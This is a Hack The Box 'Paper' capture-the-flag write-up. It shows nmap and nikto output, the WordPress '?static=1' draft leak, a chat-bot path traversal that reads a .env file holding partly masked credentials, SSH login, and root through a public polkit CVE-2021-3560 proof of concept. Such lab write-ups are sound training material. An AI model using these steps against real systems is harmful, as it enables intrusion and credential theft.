########################################
hackthebox Paper Writeup
@author: r0v3r
th30th3rguy
######################################


nmap scan 
# Nmap 7.92 scan initiated Sat Feb 19 22:41:28 2022 as: nmap -v -sV -sC -oA nmap/nmap.scan 10.10.11.143
Increasing send delay for 10.10.11.143 from 0 to 5 due to 44 out of 145 dropped probes since last increase.
Nmap scan report for 10.10.11.143
Host is up (0.23s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods:
|   Supported Methods: POST OPTIONS HEAD GET TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Issuer: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-07-03T08:52:34
| Not valid after:  2022-07-08T10:32:34
| MD5:   579a 92bd 803c ac47 d49c 5add e44e 4f84
|_SHA-1: 61a2 301f 9e5c 2603 a643 00b5 e5da 5fd5 c175 f3a9
| http-methods:
|   Supported Methods: POST OPTIONS HEAD GET TRACE
|_  Potentially risky methods: TRACE
| tls-alpn:
|_  http/1.1
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
|_ssl-date: TLS randomness does not represent time

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

 Nmap done at Sat Feb 19 22:42:29 2022 -- 1 IP address (1 host up) scanned in 60.59 seconds

###########################################################################################################
┌─[user@parrot]─[~/Downloads]
└──╼ $nikto -h 10.10.11.143
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.11.143
+ Target Hostname:    10.10.11.143
+ Target Port:        80
+ Start Time:         2022-02-21 15:13:48 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-backend-server' found, with contents: office.paper
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ ERROR: Error limit (20) reached for host, giving up. Last error: 
+ Scan terminated:  0 error(s) and 4 item(s) reported on remote host
+ End Time:           2022-02-21 15:14:26 (GMT0) (38 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
##################################################
did enumeration to get the backend server which i added to the hosts file to get the wordpress site


########################################################
wpscan --url http://office.paper

 -------WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).------------
searchsploit 

So far we know that adding `?static=1` to a wordpress URL should leak its secret content

wordpress version  vulnerable
#######################################################
http://office.paper/?static=1 ----------- vulnerability in the worpress site that leaks information

hence we get the link : http://chat.office.paper/register/8qozr226AhkCHZdyY
## add it to the etc/hosts file and open the site to create an account
#########################################################

move through the file system and directories to find the hidden file with recyclops creds 
use the creds and ssh as dwight
 
# file ../hubot/start_bot.sh
 Fetching the directory listing of ../hubot/start_bot.sh
-rwxr-xr-x 1 dwight dwight 100 Jul 3 2021 /home/dwight/sales/../hubot/start_bot.sh
-rwxr-xr-x 1 dwight dwight 100 Jul 3 2021 /home/dwight/sales/../hubot/start_bot.sh
<!=====Contents of file ../hubot/start_bot.sh=====>
<!=====Contents of file ../hubot/start_bot.sh=====>
#!/bin/bash
cd /home/dwight/hubot
source /home/dwight/hubot/.env
/home/dwight/hubot/bin/hubot
#cd -
#!/bin/bash
cd /home/dwight/hubot
source /home/dwight/hubot/.env
/home/dwight/hubot/bin/hubot
#cd -
############################################
#file ../hubot/.env

export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queeno*************
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1


ssh into the machine
#######################
dwight@10.10.11.143
password: Queeno***********
#################################
cat user.txt

f80870b0eae79d2a******************
#####################################################
#scp linpeas.sh dwight@10.10.11.143:/home/dwight
#####################################################

To get sudo 1.8.29  CVE-2021-3560 

use this exploit with my own useranme and password

#link to the exploit https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation
./poc -u=admin -p=admin
############################################
cat root.txt

4edeffa83b7f8f04d01***************
############################################
